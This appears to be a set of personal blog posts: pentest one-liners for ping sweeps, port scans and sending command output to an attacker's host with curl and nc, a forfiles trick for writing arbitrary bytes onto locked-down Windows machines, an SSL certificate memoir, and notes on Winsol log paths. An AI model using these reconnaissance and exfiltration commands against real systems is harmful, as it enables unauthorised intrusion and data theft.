Simple Ping Sweep, Port Scan, and Getting Output from Blind Remote Command Execution

Just dumping some quick and dirty one-liners! These are commands I had used to explore locked-down Windows and Linux machines, using bash or powershell when no other binaries were available or could be transferred to the boxes easily.

Trying to ping all hosts in a subnet

Linux

for i in $(seq 1 254); do host=192.168.0.$i; if timeout 0.1 ping -c 1 $host >/dev/null; then echo $host is alive; fi; done

Edit – a great improvement of this is the following, recommended by 0xdf:

for i in {1..254}; do (host=192.168.0.$i; if ping -c 1 $host > /dev/null; then echo $host alive; fi &); done

 

Windows – not the fastest as there is no timeout option for Test-Connection:

powershell -c "1..254 | % {$h='192.168.0.'+$($_); if ($(Test-Connection -Count 1 $h -ErrorAction SilentlyContinue)) { $('host '+$h+' is alive')|Write-Host}}"

Scanning open ports

Linux:

host=192.168.0.1; for port in {1..1000}; do timeout 0.1 bash -c "echo >/dev/tcp/$host/$port && echo port $port is open"; done 2>/dev/null

… or if nc is avaiable:

for port in $(seq 1 1000); do timeout 0.1 nc -zv 192.168.0.1 $port 2>&1 | grep succeeded; done

Windows – not using Test-NetConnection in order to control the timeout:

powershell -c "$s=$('192.168.0.1');1..1000 | % {$c=New-Object System.Net.Sockets.TcpClient;$c.BeginConnect($s,$_,$null,$null)|Out-Null;Start-Sleep -milli 100; if ($c.Connected) {$('port '+$_+' is open')|Write-Host }}"

Getting output back

… if all you can is running a command blindly, and if there is an open outbound port. In the examples below 192.168.6.6 is the attacker’s host – on which you would start a listener like:

nc -lvp 80

Linux

curl -d $(whoami) 192.168.6.6

Windows

powershell -c curl 192.168.6.6 -method POST -body $(whoami)

Echo Unreadable Hex Characters in Windows: forfiles

How to transfer small files to a locked-down Windows machine? When there is no option to copy, ftp, or http GET a file. When powershell is blocked so that you can only use Windows cmd commands?

My first choice would be to use certutil: certutil is a built-in tool for certificate and PKI management. It can encode binary certificate files – resulting in the familiar PEM output, starting with “—-BEGIN CERTIFICATE—–“. But it can actually encode any binary file! So you can ‘convert’ an executable to a certificate encoded in readable characters, and copy the fake PEM certificate by echo-ing out each of its lines on the target machine. Then the original exectutable  is recovered by decoding the file again with certutil.

But what if certutil is also blocked, and you need to write / paste unreadable characters?

On Linux, you could run

echo -e "\x41"

A

But Windows echo does not have an option to translate characters encoded in hex automatically.

The command line tool forfiles allows to do this, albeit in a bit convoluted way:

forfiles processes files in a directory, interprets the files’ metadata. The examples in the help information give an overview about what the tool is typically used for:

forfiles /?

FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 was changed 30 days ago"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname is new since Jan 1st 2001"
FORFILES /D +8.5.2019 /C "cmd /c echo @fname is new today"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"

For each file in a filtered set a command can be executed with option /C. The interesting example is the one referring to

echo @path 0x09

The help explains:

To include special characters in the command
line, use the hexadecimal code for the character
in 0xHH format (ex. 0x09 for tab). Internal
CMD.exe commands should be preceded with
"cmd /c".

You want to run a single command, so you need to run forfiles once. Thus create an empty directory, cd to it, and create a single dummy file within it:

C:\test>echo test >test.txt

Then run echo [hex string] for that single file, like this. It outputs the interpreted characters corresponding to the hexadecimal values:

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01"

ABC☺

C:\test>

Remaining issue: Newlines are added before and after the string. Especially the one at the beginning could be problematic if the operating system would try to find the magic bytes for a certain type of file there.

The first newline is removed by redirecting echo within the enclosed command (whereas redirecting the whole forfiles command would keep it)

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01 >out.txt"

C:\test>type out.txt
ABC☺

C:\test>

The trailing extra line is a superfluous carriage return + linefeed. It can be removed by using the set command in this way:

set /p=[String]

This sets a variable without specifying a variable name, so the error level is set to 1. Nevertheless, it outputs the value of this non-existing variable – without an appended line break.

C:\test>forfiles /c "cmd /c set /p=0x410x420x430x01 >out.txt"


C:\test>type out.txt
ABC☺

This command seems to ‘hang’ and you need to ENTER once more to complete it. cmd is waiting for input here, and you can add input from the nul device – then the command is completed in one step:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01 >out.txt"

But there is still one a blank character (Hex 32) appended at the end:

C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1
32

This blank goes away if no blank is entered between the hex string and the >:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01>out.txt"


C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1

Remaining limitation: The contents of the variable must not begin with special characters that will trip up the set command. E.g. an equal sign at the beginning is a bad character (and it does not matter if this character is hex-encoded or not).

Certificates and PKI. The Prequel.

Some public key infrastructures run quietly in the background since years. They are half forgotten until the life of a signed file has come to an end – but then everything is on fire. In contrast to other seemingly important deadlines (Management needs this until XY or the world will come to an end!) this deadline really can’t be extended. The time of death is included in the signed data since a long time.

The entire security ‘ecosystem’ changes while these systems sleep in the background. Now we have Let’s Encrypt (I was late to that party), HTTPS is everywhere, and the green padlock as an indicator of a secure site is about to die.

Recently I stumbled upon a whirlwind tour of the history of PKI and SSL/TLS – covering important events in the evolution of standards and technologies, from shipping SSLv2 in Netscape Navigator 1.1 in 1995 to Chrome marking HTTP pages as ‘not secure’ in 2018. Scrolling down the list of years I could not avoid waxing nostalgic. I had written about PKI before at length before, but this time I do what the Hollywood directors of blockbusters do – I write a prequel.

I remember the first times I created a Certificate Signing Request (CSR) and submitted it to a Certificate Authority (CA). It was well before 2000, and it was an adventure!

I was a scientist turned freelance IT consultant – I went from looking at Transmission Electron Microscope images to troubleshooting why Outlook did not start on small business owners’ computers. And I was daring enough to give trainings, based on the little I knew (with hindsight) about IT and networking. I also developed some classes from scratch – creating wiki-style training material, using Microsoft FrontPage 1998.

One class was  called networking and security of the like, and it was part of a vocational retraining curriculum – to turn former factory workers and admin assistants into computer technicians. For reasons I cannot remember I included a brief explanation of the RSA algorithm in my clunky FrontPage site. It was maybe a pretext to justify an exciting lab exercise: As the PKI history timeline shows, SSL was still rather new. Press releases by Austrian IT companies highlighted the military-grade protection from eavesdropping. It felt like Star Trek. One of the early Austrian National CAs offered ‘light’ test certificates. The description of the enrollment process was targeted to business users, but it was pure geek speak: A mysterious multi-step procedure explained in hacker terms like Secure Vault.

I don’t remember if my students found it that exciting or if the test enrolling a lots of certificates simultaneously did work so well at all. But I was hooked.

As a freelancer I started working with my former colleagues again – supporting the sciencists to subvert re-interpert the central IT department’s policies by setting up their own server, or by circumventing the firewall by dialing in to their own modem. This were the days of IT hype in the late 1990s before the dotcom bust. The research center had a new CEO with an IT background, and to get your projects approved you had to tack the label virtual onto anything. So I helped with creating a Virtual Materials Science Lab – which meant we used Microsoft Netmeeting.

Despite or because of such activities I also started working for the IT department. It was the time when The Cluetrain Manifesto told us that hyperlinks were subversive. As a ‘manager’ I should have disciplined shadow IT admins purchasing their own domains and running their shadow servers, but I could not stop tinkering with the web servers myself. It was also the time when I learned that to make things work in larger organizations – or a combination of several of those – you often need to social engineer someone.

We needed a SSL certificate – and I was the super qualified person for that task, based on my experience playing with the Secure Vault. But creating and submitting the CSR, and installing the certificate was the easy part. There were unexpected challenges:

The research center had a long legal name – 65 characters including the final dot in the indication of the legal entity. Common Names in X.509 certificates are limited to 64 characters, so I could not enter the final dot in IIS’s (Internet Information Server’s) wizard for CSRs. The legal name was cross-checked against the Dun&Bradstreet database. One would think that the first 64 characters of a peculiar German name would have been sufficient, but no. It took several phone calls – and faxes! – to prove to the US-based CA company that we were who we claimed to be.

The fact I called a CA company in the US might highlight a mistake: If I recall correctly Big CA had partners in Europe already at that time, but I missed that, or I wanted to talk to the mothership for some reason.

To purchase the certificate from the US-based company you needed a credit card, to be entered exactly when you submit the CSR. This process was disrupting the usual purchasing procedures and I had to social engineer somebody from the procurement department to join me in my adventure, bringing the corporate credit card.

The research center was a company owned 51% by government – so you had SAP and insane management deadlines as well as conferences and academic publication records. The Internet in general was still dominated by its academic roots. Not long ago, there had been a single web page listing All WWW servers in Austria, and that page was run by the academic internet backbone. Domain registration data were tied to a person, to the wrong person, or to the wrong entity – which came back to bite you later.

Fortunately the domain assigned to the SSL certificate belonged to us – so I did not have to  social engineer a DNS admin this time. But it was assigned to a person and not to the organization. The person was an employee in charge of the network, but how should you prove that? More faxes and phone calls were required to sort out the fine legal points.

I did not keep records of that period, so I don’t know if this web server is alive or if at least the domain still exists. Maybe unlikely, given the rapid decay of rotting links. But while researching history for this post – randomly googling for early versions of Microsoft’s web servers – I discovered interesting things. There is a small change it may be alive!

The first version of the Windows Certificate Authority had been released as an add-on to Windows NT 4, as part of the so-called Windows NT 4 Option Pack – the same add-on that also contained the webserver (IIS) itself. It was the time when I learned ASP programming by going online via dial-up and browsing through MSDN as quick as possible not to overspend my precious monthly online time.

I wanted to relive the setup of Internet Information Server 4.0 as and the Option Pack – and found lots of support articles and how-to’s, like this one.

However, I also found live websites like this:

This is only the setup CD, so no danger yet, but you can as well find sites with the welcome page of the operating web server online – including sample ASP applications – which I don’t show deliberately. (Image credits: Microsoft.)

I wonder why I had been frantically re-developing my websites in ASP.NET from scratch – ‘just because’ ASP was outdated technology, even though there were no known vulnerabilities and the sites were running on a modern operating system.

Time to quote from Peter Gutmann’s book Engineering Security:

A great many of today’s security technologies are “secure” only because no-one has ever bothered attacking them.

… which is also true for yesterday’s technology still online!

Where Are the Files? [Winsol – UVR16x2]

Recently somebody has asked me where the log files are stored. This question is more interesting then it seems.

We are using the freely programmable controller UVR16x2 (and its predecessor) UVR1611) …

.. and their Control and Monitoring Interface – CMI:

The CMI is a data logger and runs a web server. It logs data from the controllers (and other devices) via CAN bus – I have demonstrated this in a contrived example recently, and described the whole setup in this older post.

IT / smart home nerds asked me why there are two ‘boxes’ as other solutions only use a ‘single box’ as both controller and logger. I believe separating these functions is safer and more secure: A logger / web server should not be vital to run the controller, and any issues with these auxiliary components must impact the controller’s core functions.

Log files are stored on the CMI in a proprietary format, and they can retrieved via HTTP using the software Winsol. Winsol lets you visualize data for 1 or more days, zoom in, define views etc. – and data can be exported as CSV files. This is the tool we use for reverse engineering hydraulics and control logic (German blog post about remote hydraulics surgery):

In the latest versions of Winsol, log files are per default stored in the user’s profile on Windows:
C:\Users\[Username]\Documents\Technische Alternative\Winsol

I had never paid much attention to this; I had always changed that path in the configuration to make backup and automation easier. The current question about the log files’ location was actually about how I managed to make different users work with the same log files.

The answer might not be obvious because of the historical location of the log files:

Until some version of Winsol in use in 2017 log files were by stored in the Program Files folder, or at least Winsol tried to use that folder. Windows does not allow this anymore for security reasons.

If Winsol is upgraded from an older version, settings might be preserved. I did my tests  with Winsol 2.07 upgraded from an earlier version. I am a bit vague about versions as I did not test different upgrade paths in detail. My point is users of control system’s software tend to be conservative when it comes to changing a running system – an older ‘logging PC’ with an older or upgraded version of Winsol is not an unlikely setup.

I started debugging on Windows 10 with the new security feature Controlled Folder Access enabled. CFA, of course, did not know Winsol, considered it an unfriendly app … to be white-listed.

Then I was curious about the default log file folders, and I saw this:

In the Winsol file picker dialogue (to the right) the log folders seem to be in the Program Files folder:
C:\Program Files\Technische Alternative\Winsol\LogX
But in Windows Explorer (to the left) there are no log files at that location.

What does Microsoft Sysinternals Process Monitor say?

There is a Reparse Point, and the file access is redirected to the folder:
C:\Users\[User]\AppData\Local\VirtualStore\Program Files\Technische Alternative\Winsol
Selecting this folder directly in Windows Explorer shows the missing files:

This location can be re-configured in Winsol to allow different users to access the same files (Disclaimer: Perhaps unsupported by the vendor…)

And there are also some truly user-specific configuration files in the user’s profile, in
C:\Users\[User]\AppData\Roaming\Technische Alternative\Winsol

Winsol.xml is e.g. for storing the list of ‘clients’ (logging profiles) that are included in automated processing of log files, and cookie.txt is the logon cookie for access to the online logging portal provided by Technische Alternative. If you absolutely want to switch Windows users *and* switch logging profiles often *and* sync those you have to tinker with Winsol.xml, e.g. by editing it using a script (Disclaimer again: Unlikely to be a supported way of doing things ;-))

As a summary, I describe the steps required to migrate Winsol’s configuration to a new PC and prepare it for usage by different users.

  • Install the latest version of Winsol on the target PC.
  • If you use Controlled Folder Access on Windows 10: Exempt Winsol as a friendly app.
  • Copy the contents of C:\Users\[User]\AppData\Roaming\Technische Alternative\Winsol from the user’s profile on the old machine to the new machine (user-specific config files).
  • If the log file folder shows up at a different path on the two machines – for example when using the same folder via a network share – edit the path in Winsol.xml or configure it in General Settings in Winsol.
  • Copy your existing log data to this new path. LogX contains the main log files, Infosol contain clients’ data. The logging configuration for each client, e.g. the IP address or portal name of the logger, is included in the setup.xml file in the root of each client’s folder.

Note: If you skip some Winsol versions on migrating/upgrading the structure of files might have changed – be careful! Last time that happened by the end of 2016 and Data Kraken had to re-configure some tentacles.